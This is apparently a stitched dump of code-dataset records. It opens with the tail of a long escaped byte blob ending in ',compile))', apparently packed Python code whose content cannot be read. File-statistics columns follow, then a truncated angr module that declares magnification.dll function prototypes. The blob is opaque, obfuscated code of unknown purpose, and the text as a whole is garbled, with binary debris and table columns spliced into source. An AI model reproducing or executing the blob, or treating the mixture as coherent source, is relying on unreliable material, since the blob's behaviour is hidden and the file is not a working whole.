92\xbf\xeb\x05D\xb4\x13v\xfchw\x18\x80\xacb\x93W\x7f\xee\xd8\x82\xd7\xf5\x82\xb2\x93\xbcR\x0f\xd9\xd2\xd8\xfc\xc3\x07\xf8\x08\xee\xc9oEC\x08\xe8\xc3\xba\x013M\x8f\x87\xc5\xe9f\xc2\xd2\x17\x87\xeb;v\xd0\xd8\xed\x9cY\xd4\x80?\xb3Q^6\xa5G|]\xf7ow\xdf\x0b?jo\x9e\t]\xc4Y%\x8d\xcc\xdbk\xdb\xaca\x1b@f1\xd5\xe5]\x1f\xfb\xc3\xb2\xd0o}K0\xd7\xee \xc4?L\xa2\xa9\xb3/\xdb\n\xa8\xda!\xed\xd51!\xe8\xb8iV 
\xb4\x1c\x9c\xe6\xc4gpl6\xe9\x05\xf5\x90\\\xb7i\x0ff$\\\x10\x0bI\x0e\t;\x1c\x81\xec\xe4\xfe\x12[Z\xaf\xbe!"v\x19\x8d\xe1\xcb\xff\xbeON=O\x0c\x05\xb1\x19v\xd80\x10\xe2\xc8\x80\xc4Q\xec\x16\xce\xb6\xdf\xe2\xc8~\x8c\xcdJ\x0c\xf4\xd7>9\x86\xcd\xbd\xb9\xe9\x84\x1f\x8ax\x1c\xa3zC\x1d\xbc\xf8|\xbf\xb3\x9f\x1d\xdaO\t\xca6t\x1a\'\x95\xc6%\x82S\xca\x96\x9a\xdeB\x13\xa6\xbf\x8dm;}\x19r\'\xea\xdb\xc08\x96S\xe8")\x88m\xfd\xb4\x0f\xad\xc5\x0b\xees\xc2\x0e|\xcdw\xb6\xf2,\xf6$g\xb3\n\x8fq\xed\xd2<\xd3\xde+\x84\xec\xa8\xb5\x9ao\xcc\xbd\x1c\x9b\x12\xbc\x91\xbd\xc1\xab<DdN\x99\x01\xf7~\x0bw~\xa1_\xfb\xd6[\x92\x1a\xcb\xbaE\x90\x8f\xefJ\xddC|\xaa\x9b?\x1a\xc7\xf9\xec\xf7\xe7\xab\xd1t\x10d\xc6\x9c\x0f\x94\xbe6W\xee\x19W\xc8U6\x18\xa1\xd6\x00s\xec\x8d&bd\xbf\xe8\x1e\x18T\xf9\xd5\xdf\xf2\xe7\xdeNT\x1b\xef\x1f_\xc5\xfd\xde\xb2\xa3\x170\xff3h\r\xeax\x7fEG\x9e*n\x8d=n\xd7~\xc8,l\x08\xe2\x12\x11H\xe1s>\xba6\x89\xed~\xad\xdc\\\xe5C"{0\xa6\x18N\xcd@\xb7T\x10\x1b\xe9\xd4\xd6_\x85\x89\xc6\xf6\xa9\x84\'Y\x8d\xdf\xb2\x1bB\xca\x1a[\x92ca\xce\xd8@wEI\x14\xcb\x8e\x90\xefl\xda]\xc6\xab\xd7+\xcd\x92\x90\xb3\x1c*:\x91\xe8V\xaeAJ\x93\x8eY\x06\xe4Tg7\xfe\xcf\x16\xaf\xe0u3\xf2\xa4J\xd3*?\xfb`k\x1a\xf2\x01\xe3\x9e\x9a<\xc7\xa7\xbf\x05k\x07=\xbf\x1d\xa6\xce0\xe1\x87\xb02%\xa5\x81\x07\xc5\xf9\xb3\n\xd3d"h\xc8\xf1\x0e\x8bMF\xfe\xa2\xb0M\n\x95#\xec\xe9U\xa8\xa1\xe3\x84\xa2h/Vu\x1cJ^OtW\xc4;\x91m9\x95\t@\xd4\xec\xe2\x93=$\x8e\x18P_\xe7\xe28v\xe1\x9a\xdd\xa3^\xc0\x1b{\xa7\n[\x92.c\xeb\xd2\xa8\xd7\xac\xb7u\x88Tk\xab!\\\xd5A\xd6>\x8a\x9e\xdf7\xea\x8c\xbd|\x8cr\x01[k\x81\x97\x90\x92\xa2\xa6\x14\x17o\n\x1d\xec\xe0d\x971U\x14.\xbd\xab\x0f?\xbf\x17&\xa2\xb2q\x9d\x1f\xeeh\x1d\xc9\xbe>\xb3\xbf\x1e\x12\xfe&\xff\xf8i\xe1\\\x80\xc7\x10\xec4J\x95\\%6\xae\xfap\x02\xcao-NG\x9f\x9d\xbe\x98\x99zM\x97\x07\xc6\xa3\xf3\xb3\xd3cx\x8d\xa7\xd3\xe6\xc5:1FZ\x83\xa6/\x1f\xf2\x19\x9e\xf6\xc69$d8\x8c;\xff\xa1T\xa2\xb6o\t\xca 
\xa3\xe6\xfb5\x0c\xe0#B\x0fx\xcd\xc6\x19Q\x8e\xf0\xb3`3/P0\xd7\xc5\x86\nD\xab0\x8cZL\xe07E\x14\xf3\xb7\x89:x\xce{\x03:\xd5U\xa2/\xac\xdc\xf9\x97\xe2\xc4\t\x14\xb5B\xb9\\\xa9\x99@\xd8c\xfa\xe6p\x93!\xe5\xc1\x96\x99\x1e\xdfaX|\xdd\xad\xbc\x97\x97\xcbS[q\x92\xd2[\xff\xce\x12\x15\x83\xeb\xf0\xbc\xdf\xde\xdfCy\xd5m\x82\x08\xd7\x8f-\x9b\x95/\xfb\r\xc2\xbc\xb8\x0c\xa4\xb1\x11\xb3\xe4\x94\xcd\xe8\xed\xb8b\xb9N\xa9\x19\xebv\xbbv]#\x05\x11\xa6\xcc\x83c\xf6\xc5\x9cT\x10Z\xe9\x12\x86\x01\xe7+\x18\xa8\xdd\xec\xb2\xe4\xfa\xd1\xceN\'\xae\x97\xcf\xb5M\x96\xe1\xc2\x1a\xde\xfbUI\x84\x15.(;\x07~\x12a\xb4\x90S\x14F\xa4\x18\x07\x80\xd5E:EQ\xafB=\xaf\x16\x15\x9a\x07\xe5(\xbc\xe7\x02\x87j\xf1,y\x88\x123?6\xb3L\xe7\x98"\xc7,\x9b\xacV\x9a}\n\xdb\xc3\xfe\xb4ZW\xa9yv\xfc\x00\xcd\x0f\xd0\xa1\xa1\x15\xec\xae,\xacL\x08Gk4\x98\x8e\x92\x9a\x99\x19\x85\xbaST\x1b\xd9\x93\\z\x98m\\j\x10\x19\x89q\xc7[\'\x96\x81t\nP\x88\x07w\x7f\xea\xb7\xe6i\x02\xacZ#F\x82$\xcc.wj}\x89!\x9a\\\x15{\x9d\x15\x15p\x16\r\xb5\x16R\x92yvq\xb0\x00U\x19\x87\x9cC{\x9b\xea\x04\xf5\xce\x0c\xdb\xdd\xddQ&[\xfb\x9b\x86(9\xef\xaeZ\x88C@-?\xb0W!\xb9!\x93\xc1J*\t\x07l\x9by\xa3\xf6:\xe6\x88\xf0\xbc\x94\xff\x82Ov\x80\xe7\x0c)\x96~\xe1\xfeA$\x8aV\xb9;\xb2\xe4|`K\x06\xd1O]\x88H#&\xa2I\x14\xf7\x8a\xc5\xedu\x7f\xa8\xd8\xa8\x84R\x18O7\xd1\xf0S\xadJk\xff\xec1\xd4\xa1\x11e\xccEW\x951\xf6\x1b\x1a\x9f\x8d\x07o\xfd9\xee<\xcc\x1c\x81\x94\xc6\xac3+\x8c\xf93\xdb\x91\xa6\x88\xa6\xee\xd8=%\xb4]\n\xc6`\x9c\x99\tY\xb0\xf1\xb7\x16.\x93\x80\x94\xc8\xc6+*\xf2\xcd\xa3\x83\x7f\xe8$qC\xc6J\x14J\x83;\xe2X\x83\xde\xcej\x9b\xee}2\xeb\xc1D\x8f(\x1d\xad\xf1\x827\xe3d\xba\x7fsv\xbe\xfcP\xe5"\x1e\xf4x\x18\xcd\xee]\xb8\xf1\x13m~\xdd\x93j$\x0eH\xd2o!\xebS\x9f|\xc3\x8e\x15\x13/b\x0b$\x08\xc0\xb3L\x87\xa3\n\xdbB\x84D\\\xaa\xd0\x95O^\xd9\xe5\xea"P\t;\x8b\xe8\x8e\xec\xef\xc8\xb1SG\x07/ZaN\x9f\x16#\xb6\xa8\xc0\xc6\x00M\xe6\x8a\xd4\xca\x8f\xb6\xec=A\x0cE\x0cqN\\\xef\xbey\xb1Zn\x9a\x16"\xfb\x8e\xcb\xdb\xbf\x14\xea\x91*\xf0\x86kA\x81\x9d\xc5a<y9\xb0\xc3s\xa5\x15\x84p0~&\x14So~r\xdb0\x0b\xa1\x8f\xef*{\x1a2`B\x89\xa5\xc5fu\xf3\xd8\xecc\r\xf5L\xfb\x0f[\t\xdej\xa37\xcf\xdb\x8d\xed\xb3\xc9\xb1\xf3/L\x80\xc6l-{y\x1c\x13m\xd9\xa8l\x04\r&\xdcq\x16\x13[\xcb\x96\x94x\x164s70K/]{sv\xaa\xfc42T!j\xa98\x08\xe4\r5\'^\x9a\xbe75Gh\x1b\xc5\xac\x90<T\xcc\x9d\xca\xcf@i\x80\xb5\xda!)\x171\xdc\xd5Gf\xac\x19B\xd0-\x80\xf3\x1a\xb4\xc9\xa6\xc0v\xd7\xae\x81\xc9q0\xc5\xd8\xba\xd0y\x16L\x13\xf3\xfan\x99E\xb3`\xe9#8\xc8\x1c\xa2 
\xa01v%\xb0\xda\xe2\x9al\x81M\x0cT\x1a\x93~\xb6ca\xcd\xa4j\xc3-\x7f\xe0\xe3A7\xe0\x9d\x192\xe4\x94\xe7\xe7\xd2\x12\xe0\x86\x83\xa2\x11\x05\x8c\x91p)&\xbc\xf7\xfd\xbf4\x88\x10g\xbf\xf5\x137\xb8\xfb0m.\xd9\x92\r|\xcc\x9d\xbbC\xbe\xd5t\xa4\xb3\x8arB\xdf\x1f\xfd\xb1\xeb\x1c\x91\xc3HN\x02"9\x9bqM\xbe\x9e`\x1b\x96\xe4\xa0\xee\rw`\x1dy;\xc2_q5\x8a\x04\xb5b\x0c\x8a!6\xed\xde~\xbd\xa6\xb8M\'g0\x9a\xc8;\xc8\xebHW1r\x80\xbd\x18\xadf42\'l\x95r`\xf9\xb8\x0b\xb0\x90]\xe86\x7f[P\xd3\xd5/\xced\xfbdm\x18\xefa\x07\xa3\xe3\xbb\xdf\xed\x89m"\x9d\x82\x9c:\x97\x18A\x04Y\xc8\x81\x8e\xd6\xeb\xe5\xb8\x1d\xee\xfb\xc7\x19\\\xc9nvMr\x88\xf4z\xde~\x94\x1e\xb3\xe5k\tr!\xe5a\xcf.\xb4\x87\x9e4\xc1g\xa8?\xb3n\xcbA|A\x8f\x01\x0b\xd1\xdfX\xb5e\xc05\xa8\xd3\x95\xa5\'\xda\xfb\xf6\x03\x82\x04\xbf\x8an[\x04$qH?\'l\xc1dn\x96\xc9\x8a\x08\x0f!\xb8\x82\x06h\xf6\xfd\xc1Aw\x9c\xce-"!\x9bV\xfd\xed\xb1\x1f\x86\xb3\x0c\xf3\xed\xbc0\xb3\x06\xe3\x98x\xbf\xca\xff\x06ga\x0e\xac\x81\xa1%K4#\xf9|\xdc~\xd9;%$\xb4\xbe\x06\x8b\x9c\xd85e\xf6\x16m\xe0C\x8f\xcd]\xf2\xa1\x9d\xe2&B\xc6c;\xe6S\xc83J\xab\xa3?\xd5\x88\rC\x19\x94\xd2Lg\xc0\xa0\x1b\x97.{3H\xb1\xc3xX;\x1b\xc8\xa1[t\xbcG\xaa\xb1S\xdd1\x13.\xa2B+}uTl\xdf~J1(\xe0~\x19\x98~\xb16 \x8a1\x1a\xb6\xcd_[\x06[\'(\xbdP<A\xe4D\x93u_\x10\xa0\x08\xdbJ\xf9ZbQ;\xf7\xcd\x1d0\x0bT.\xe9\xac\xf7=\x1c\x00mq\x0b\xdf\xe5\xf7XhO\x84\x1f\xf5\xe3\xaf{\xcb\x19G<\t\xe1[\x1d\x8e\xa4I\xb6\xea\xee\xe0\x05.s\xfb\xaa:\xfa\xb5\x0e\x88\x08<\x01\x167\x84\xf9\x13=\x8d\xd0\xc1\xde\x8bL\xd2&?D>l\x94\\R\x1a\xc1)N\xe9\xcc\xe9w\xa9\x1f^\xac\x19\x10#P*xLP#q.\x7f\xba\\\xa9%~\xd6\xf0x\x06\xc4i\xf5o\xa4vr\xb1*8Bk\x1e\xe2U\xbb\x01us8\twPL\xad\xe8M\xc4\xd9b_D\x0b7C\xf3\xcf(!X\xf0Y3\xe5\x07\x1d\xac\x0fO\xaf|\x7f\x83o\x0e\xf6\n\x04\xfbdHI\xf0h\xcc\x8f1\xcfdo\x7f\xc7\xb6\xc1\x16\'\x8ex\x8c\xb3CD\xdc[\x81`\x8c\x96\x042z3\xe5\xd2BU[E\xc6\xb5[\xf1\xfa\xf5\xce\xac\x11\x9b\x98\xdb\x1dA\x9d\xac\x01\\\xfb`V\xd1J\x83\xf7\x1f\xd9u`&\x8b\xc3\x9bs\x90\xc1\x89\x1f=7\xdc\xaa\xbbwd\xdbq\xb9\xe9\xa7p\x90\xc6\xee\xcev\x94\xe0\x8b\xcb\xe6\xa0\x9eG\xd5l\x8c\x10\xe7\x1d\xb0\xe6NUFc\xb9\x9aF\xa5\xce69\xb1\x05\x8d\xda\xb1q\xfcVo\xefU\xbbo\xb2\xb5\x90\x06\xf3\r<a\xa4fM\xd6t\x82\xbb\tj((\x11<\x9e\xaeRk\xd4\x8dg\xd0\xf0\xa1\xf4\x99\xdb[^\x81\x112\x80\xebh\xf5\x86\xc0E\xd2\rf\x94\x84\x82\x0eCQ\x8fT+\xea6U)\xf3\x9fhKO\xbd\xa2\x15/\xa7R\xa4\x17v\x88\xa2\x88:\xbc\x1d\x18!P\x9e\xa0\xdb\xa4\xa7\xa1\x15\xa6d\x7f\xb8\x95a\x88X\x13\x8d\x0bMt\x8b\xe6\xd0\x89\xf05\x1b\xd5hz\x87\'u<\xad\xac\'\xbb8\xadD\xbb\xc4\x0b\xb3\xda\xf7\xdd\xb6\x9b\xc4.\x99\xd06\xbd\xd8\xa9NOf\xaf\xa2Z\xebx\xdb\t\x19/WG\xdb\xc2;\xc5~w:n\x0cy\xca\xabz\x06\xcf~\x84\x8di{\xbb\xa02cL}\xda\xd8\xce\xacGe\x8fn\xad5[\x17%g\xab\xca\xc7\x8c\x05\x06\xa8h\x987Y\x83g\xd8\x95\xb3\x98O\xe2\x90\xe7\xd0M\x11\xc7!\x1f*&G\xf0\x99<\\Q\xa9"u\xcf|v/&7\xf3\xa1@\x84q\x1cX<fc\xb3B\xe0\xd1\x13\xc6\x8a\x9d\n\x82\xadb<\xe3\xde+\xb7.\x1e\x9f\x18tA\xe5F\x0c\xd3\xecI\x84jN\xbe\xc2Z\x95\xfa\x97H\x19\x95w\x83\x03%\t\xe8\xf6\x8f\xe3\xceB\xa5\xae\xffIH\x92\x82\x13\xf8\xc2p\xc5\x16\x90\xc8+\r\xd5\x83\x17W\xecK\x9b\x86\x12d8\xf0\x8e\xf34R]\xbd\xa2\x92\xa4\xb5\xa6\xc8G-\x1a\xaa\xcb\xdd{f\xeeCo\x86(\xca\xcf\xf0\xba@\xdc\x9c\xf2\x84\x1a\xda-.\xdfyl_\x16qX\x00Rm\x82\xca\xf5\xe7-\xdb-\x9cb\x8a\x0ba^\x96\xc7|\x05?\xd4b\x9cR[A\x1f\xb1\xac*\x17\x0b\xf1$g\xb0\xe6/\x9fKF\x85p\x11\x9f\xe5\xaa\x1cc\x12\xdf\x1a\xcf\x8e\xed\xb0\xe0\x820t\x01\x94N1\x00\x95\x94\x19\x91\xd7\xd2\xe1\x88\xa2\x8dT\x9f\x96\xdf\xb3\xbb\xde\x99\xb8\xec\xaa\xd9\xbd0@\xc2\xe8\x16\x8b\x87B\xf0\x80\xbdc\r!X\xc7p\x14\xa1(I_\xb8\x81h\x08\xe5C\x0b\x9f\xc0\x81\xe6\x0c\x13\x7fNL\xe5\tV\xf
5\xbd]\xcc\x06\xc2\xb4Q\xf9z\xcd\x1e\xb0%6\xd6*\xad\x17*O\xd8\xb9|)(\x0c\x7f\x19\xb6\xdc\xef\x1d\xf8\x14$\x15\x03\x994j\xde+\xdbW\xbd\x9c\xaa\xff\xb5\xe3\xa4\xaec[\xe3.\xf9\xf1x\xfaBvL\x9c\xa1\xb8=X?\xd6\xc7\x08\x9e\xef\x8d\x8d\xe2\xcd\x07P]&\xdc\xf8\x8c\xff\xff\x1e\xcb\xf1\x04\x87\xb5\x03\x08ZN*a\xe9&\xcd\xad\x10\xfb -\xae\x05#\x14\xc9\x19\x8e\xa2G8\xc3\x8b\x94\xcd\xfd\x8c\xedP\xe3>\x95\x18D\xd5\n\xdc%#&7\x0b\xd9d\x17\xcbB\xb1\xcak(\x1b\x86\x83[\x7f\x16q\xfa\xb3v{b\xc8\x08q\xc6q\xe7\xc1\x88"\x88[?\xa2\xb8\x86\xea!\x01s\xba\x19\x02\xe6\x87\xcf\xf9B\x1fT\xa3\xe9\xa1\x11\x1b7\xc4q\x7fW\xff\xe4\xa7K\xc5{\xed\x9d\xbfx\xddb\xcc\x9e\xc6zln\xea\x15\xd9>\xcc\xc8\xf8\xc2\x1e\x82\x89+\xa2K\x04\xf1\x94>+\xbd-h\xd4@\x82;\xbe{S\xf8\x1b\xe5\xb4\xba\xf1\xab\x02K\x9d\x1d\x02*~\x90}\x87\tK\xf1\x90\xbf\x94\xe6\xfcI\xebMlk{p\xfa\xbd\x1f\xffb\x10\n\x1f\x90\xf4\xbe\xe4\xa3m\xa8\rm\xa2\x14\x1d\xb1\xbe\xb2d\xfd\xf4\xca\x9c\x1e\x0cv\x16Z\x97\xbc\r\xe8S\xe3\xe2\x13{\x80\x82L\xc6\xc1\x91\xb0\xea\xed\x9a-K\\\xfe\xab5P\xf6\x93\xc1\xde\xaa\x99\x99\xcb\xf4\xe8\xbab\xc0\xd6\xf2\xbd.;\xb0\xdfq\xc4\x95\xb0\x04\x99jO\x9d>\x8d\xd2 Y\xa4\x98\x1d\xff\x90P\x96\xff\x85B*\xb4\xbay,V\x0f\n/+I\xa8w\xc7-6#\xec\xed\xcaR\xa8\x9a\r[\xdf\xa2\xe3\x8b\x1a0\xc5\x10\x96\xa1;\'\xb4{v\x11\x0cA\xd3\r`\x19\x1f4\xf2\xf8\x06-E\xb5._O\x9dEDy\xcd\xcdgz\xb8\xd6\xbe\x83M\xfc\xcd\x06\xb0t\xc8\xf5\xb3\xa2\x8f;\x81\xfd\xe7\xdey\xed\x1f}{l\x0f\xc5\x99%d\xcb\xdcESc\'\xe2\x83\x1f\x18C\xe5a%)\xaf \xbc\xb0\x8f&\xa7\x91\x9d\x14\xef\xd6pV1!\x87L\xc4x#\xb1\x80\xa6\xee2\xf2\x17\n\xbdib\xbe\xa8V\x91\x8e\ru\x98\xb7A\xde{\x11\xec\xe1\x88<\xf6\xafQJ\xef@\x8b\xc4K\xd5L\xa6h\xb8\xbf\xc2\x94\x8d\xc1\x1a\xa2\xb6\x13\xe3\xae:x\xf7~\xeb\x8e\xbdG\xa3\x82S\xed\xeby\x8b\x93\xfa\x14\xc2R-1\xba\xd8\xb6\xdde\xcfl\x89\x99\x02\xab\xc2\x14)\xd0\xe6\xf2w\xbc\x1a\x9f\xed\'X\xae\xf7\xcb\xc9\x0by\x140\x97\xda\x18pZ\x9c\xce\x0f\xe1\xff\xf3Y\xcc\xba\xa2Wv\xd5\xbf\x8a\x0f\x9e\xba\xd8\xd9C\xfb\x0bGK\x17\x13\xe0\'\xe5_\xf7\xa1\xef[s.\xbcQ\xb7\xe4k\xca\xd7\xe6\xa3(\x94Y\xdc\xfb\xab\xe8\x0e\xcf\xc9\xb9\xe8\xa0&\xc4\xdd\xb5\xb77\xf5\x02\xa0yR\x985WT\x98\xda\x91\xed\xb3s\x04b\xfd\x0c\x9a\x0cP\x995\xa5\xdf\xbb80_l_)g\xdb\x8b\x16K\xb6?Z\xe9\\\xfe\xf1\x00K\x94\xff\xd2\xb0\xb7>\xcb\xecv\xd6\x88\x13\x99\xb0\xfa\xd9EY\x19\xfd\x1f[\xd1\xba\x8fCr2v\r\x0b\xb6s\x8d\xddZ\xaf\xc9\xfd\x03\xfc\x94\xa1\x04T\xdc#\xfb\xfc\x9b\xdde_\x8e\xdf\x9e2G\xca\x92e\xf7\xe8\xbf\xafoTTb9\xf3La[\xfe\x0c\x15\x90(\xfc\x10\nT*Gll\x81\xb0\x86\xbd\xeeN#\x0ef\'\xbc;BRh%\xe5\xa7\xfaX\xfc\xcb\xd0\x86\xcb\xcb\xde\x19zD\xc6_\x8efJ\xb6\x05a\x0cm\xd3`:H\x14\xf6\xa1\xe5\xdfD\xfd\x977\xaa\x1c\xf3\xa4\x91t\\\xbePT\xe7\xb1\xb2y\xbfSi\xd4+V\xbc\x14\xe7=0\x81Q\xf7B\xa7\xa2 \xf1\x14&\xb3\xd0\x8a\xf7\xd9w\x95\xf7k\xb1u\x1a\xa3k\x19\x0b/\x17t\xd1~oj]K2\xae\xa3\xc5+v\x8fq\xc6\xd9\xe5\x9e\xdf\xb0\xe8\x85\x8d\xf9D\x8a\xcf\xaa\xa3%;X\xbd16\xcc{\xd6\xd1\xfe\x1b9\x83\xd8\xa2\x08\x97\x8e\xe34G\xd5H\xe0\xa5\xe6dfU\xfaB\xbc\xf7X;\x97\x98\xc1l\x8b\xf1#\xf9\x15\xe4v\xdd\xe1\xcaS\xe1\xebI\xa5\xb1\xd57w\x95q\xabA\x8c\xe7\x94u\xabE\x94n\x10\xd2\xd2\'v<\xc7\xb0\xe4\x08\x0c\x03\xa9\xac\xa5\xa5dm\xf6\n\x9c\x9c\xf8\xd1@\x9e\x8d\x9a\xc7\x08\xf2\xd2\xdaBM\x87\xd1gL\xb8\x11\xe84\x80\xda\x1cL\n\x8d\x8e\x92k\xc7z\tKz\xc2/\x98\xd1\xc2O\xa5\xaf\xcc\xfa\xb49\'w\xa20\x03\xd2\x1f\xcc\x81\x0bk\x8b 
l\xe0\xf6\x9a\xe1\xc5\xe9;\xde\x07\xee\xcf,C\xe5\x19\x03\xa7\xe6\x80\x14\x7f\xbct3G\xf6\r\x1c\xf1\x91\xdb7\xd5C\xf9<z4\xaf\xf0\x82\x10\x18\xd3\xdb=\xb1\xa8:\xc8e!\xe0\xa6\x83O\x0f,F)I\x82\x14#\x83&\x12\xb2\x05q[>\xa9L\xc4\x14\x0fFq\xc4\xa1|\xcbV\x92\xee7\xaed|\xa8\xa6\xeeP\xd6/`@\xd3iF\xf4\x8d\x19C\xa6\xae\xd8Z4uP\xbc\x00\xc60\xbe\xaf\xb4\x9d\xeb\xd3\xda\x8d\xab\xc5r\x8bs\xc8\xa9S\xc6\xa7\x9c\xdb\xad$\x19\xca\\D\x8c-\x98 \x0f\r\xf9xH\x87q\x12\xca\xc5\xb1\xa7\xaa\x81\x0c\xe9\x98\x9b\xb7\xa3\x840\xfe\x94\xa4\xff\xf6\x81}!5\xa8c\xb9!\x84\xb3`\\z\xd1\xf48\x91D5\x06\x13(\xb4\x7f\xa3\xe1\xc8\xab\xd1\xc8R\xc6\xd5"\x14ueW7\xbf\xe0\xd9\x8f\x05m`x\xcb`0]\xdc\xef"\xe1\x02au\x98\x0f\xcfh"\xb5\xd0\x96\x03U\xdd\xa7\xfc\x18/\x04\x96\x18\xb1Xx\xd0\xee1\x002r\xf6\xfbW\x07\x9a\x9f\xc6\xf6fYn\xb6\xd0\xf7\xdf\xe4\x15\xba\x07\xca9ka\x0f^~\x9e5\xc0L\x99bl\xefC\x9e\x13\xe8\x0b\x8c<r;P\x83\x13\x8fT\x04\xea@M\xf1\xdd\xf7J\x9c\xcfw\xb6\x1e\xa4\x16\xb9\xdb\xd5\xa87\xc17s\x7f\x19\xef,\x1d\xa0\xe6\xec\x0e\xed\xe7"w\xe5w5\x1aX\x1eg5&\xfb\xd0\xba`\x19h\xd1\xbd]i\xafk\r\xeb\x16TH\xf1\xa1x9\x05\x93\x85:\xc2\xff\x9a\xba\xb6\x9d(\x82 \xfa1\xca\x1ad\x1fz\x18\xf6\xd2\x18^X\x89\x81\xa0Y@\x8d$cp\xa6\xbb\'\x9a \x18\x19\xc4\x18\xfdw9\x97Y}"\xbc\xec\xf6VWUW\xd59U\x95\xea\xdf\xe0\xda\xcc\xad\xf8\xb8\xa4\x8c\xce\x87|9\x1cc,[6\x9f!\xb5jj\xbek\xfe\xc1\x8d\xdc\x10\t\xe1P\xd2\xd1i\xe8L\xf2\xe0\xb2y\x9am\x94\x1b\x83Ke2T\xc9T\xb8s\xf7Qj\xdf\xa7\xd3W\x00>\xd2\xc2)\xa5\xb6\x15\x11\x9d|\xd2l\xc6\xec\xb3\xc2\xce\xad\xbaa\xb6\xba\x92N\x91\xc3S\x7f\x96\xac7\xa3\x81\xb9\xd7\xceE\xe6\xe8\xe2\xca\x18\x15\x8d\xcb\xa6\x99^/\xf5h\x14\x90Tx+dv\xe2\xa1L\x98\xed\x16\x8d\xed\xd1\xb6\x8dju\xfdG\x7fpu\xb37b\x12f\x11qR\x14;q\xb1:+\xb3\x95\x84\xfd2\x8bC}P\xd8\x80e<\xa9\xeb\xee\x8c+\xd9n\xe5d\xbe7\n\x07S\xa7=w\xcd\xcd\x95\x8c\xafg\x87h\xef2`\x0c\x086\xd0\xb8X\x19Y\xe5 \xd58a\xe3+\xd3\xfa\xfb\x89<P\xc5\x991\x86\x10\xcal\xcb\xc5\x85\xb9\xb1[\xf6(\xc1\x01\x84\t4\xb8z\xfap\xd2\x0cGk9\xb8d\x08$\xa1\xf6P\xe0o\xab\xdd\xd7\xbb/\x0e\xce$J\x12\x95\xcd5g\xef\x9e\xff\xb2\x07\xa4\xca\x07\xfb\xb2\x19\x04\x0b\xea}\x95\xaa\xb5\xf9\x104\x06\xe6s\x1d\x07\xd6~P\xfa\xc0\x9c,\xc8!\x92i]\xbca*\x8f\x95R\xc8evy\xbe~\xbe\x82T\x98s-\xa4\xa9\x1c3]\xcb\xb4S\xfb\xf6\xdd\x1b\x84\xf4\x19mHi5\x96\rHO):;u\xb3\xe8\xe1\xd7|\x90\xf7\xa0\\ f\xc9,D\xb6\xc9\x11\x8b\x8d+,\xf6G\xcd\x89?\xb6p\xe7\'\x8ce%\xef\x9cQ\x00E%\x89\x87I\xbf\xeetm\x1c\x15\xe2\xda\xfc\xd2%:-\x97\xd9\xd3?\xc4A)\t\xdd!\x1f\xc1\xeae3\xdc\xa32\xd0\r>\xf2\xa8\xcd\x84Y\xfe\xfb\xa9\xad\x99o$a\xe2|\x8f"\x1ap\xc4\xb9-\xbf_\xd7\x9fv\xfe8\xd9\xc1N@\xb6\n!<&\x14\x1ce\xb6m\xbd\xa3\xc7+fs\xf5\x93\xa1\x83\xc2_\x17\x90\xb8\x95Z*\x8b\xef\xe6\x00:\xb3}\xe8\xaeX\x9b\xf9)at\xa0\xf5\xf0=F\x9b\xf1\xb2\x1e\xd0\xdb\x815\x0e=\xc0\xa5\x9e\xec\xa5pz\xaa\xa7#\xf4\x17\xccTx\x07\xcf\xa6\xe9\xf6\xeb\xb7/\xd7e{\xfb/=\xc9\xc4\xce',compile)) | 28,732.2 | 143,472 | 0.734785 | 33,072 | 143,661 | 3.1849 | 0.178187 | 0.000399 | 0.000152 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.232405 | 0.001845 | 143,661 | 5 | 143,472 | 28,732.2 | 0.502141 | 0.001253 | 0 | 0 | 0 | 119 | 0.662252 | 0.660419 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
fe2301d9cd1e7d7943af459f66e0153c024a0c09 | 10,814 | py | Python | angr/procedures/definitions/win32_magnification.py | r4b3rt/angr | c133cfd4f83ffea2a1d9e064241e9459eaabc55f | [
"BSD-2-Clause"
] | null | null | null | angr/procedures/definitions/win32_magnification.py | r4b3rt/angr | c133cfd4f83ffea2a1d9e064241e9459eaabc55f | [
"BSD-2-Clause"
] | null | null | null | angr/procedures/definitions/win32_magnification.py | r4b3rt/angr | c133cfd4f83ffea2a1d9e064241e9459eaabc55f | [
"BSD-2-Clause"
] | null | null | null | # pylint:disable=line-too-long
import logging
from ...sim_type import SimTypeFunction, SimTypeShort, SimTypeInt, SimTypeLong, SimTypeLongLong, SimTypeDouble, SimTypeFloat, SimTypePointer, SimTypeChar, SimStruct, SimTypeFixedSizeArray, SimTypeBottom, SimUnion, SimTypeBool
from ...calling_conventions import SimCCStdcall, SimCCMicrosoftAMD64
from .. import SIM_PROCEDURES as P
from . import SimLibrary
_l = logging.getLogger(name=__name__)
lib = SimLibrary()
lib.set_default_cc('X86', SimCCStdcall)
lib.set_default_cc('AMD64', SimCCMicrosoftAMD64)
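# Win32 exports use stdcall on 32-bit x86 and the Microsoft x64 convention on
# AMD64, so those calling conventions are installed as the library-wide defaults.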
lib.set_library_names("magnification.dll")
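# Each entry below maps an exported symbol of magnification.dll to a
# SimTypeFunction prototype: positional argument types, return type, and
# (where given) argument names, for use by angr's type and calling-convention
# machinery.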
prototypes = \
{
#
'MagInitialize': SimTypeFunction([], SimTypeInt(signed=True, label="Int32")),
#
'MagUninitialize': SimTypeFunction([], SimTypeInt(signed=True, label="Int32")),
#
'MagSetWindowSource': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimStruct({"left": SimTypeInt(signed=True, label="Int32"), "top": SimTypeInt(signed=True, label="Int32"), "right": SimTypeInt(signed=True, label="Int32"), "bottom": SimTypeInt(signed=True, label="Int32")}, name="RECT", pack=False, align=None)], SimTypeInt(signed=True, label="Int32"), arg_names=["hwnd", "rect"]),
#
'MagGetWindowSource': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"left": SimTypeInt(signed=True, label="Int32"), "top": SimTypeInt(signed=True, label="Int32"), "right": SimTypeInt(signed=True, label="Int32"), "bottom": SimTypeInt(signed=True, label="Int32")}, name="RECT", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hwnd", "pRect"]),
#
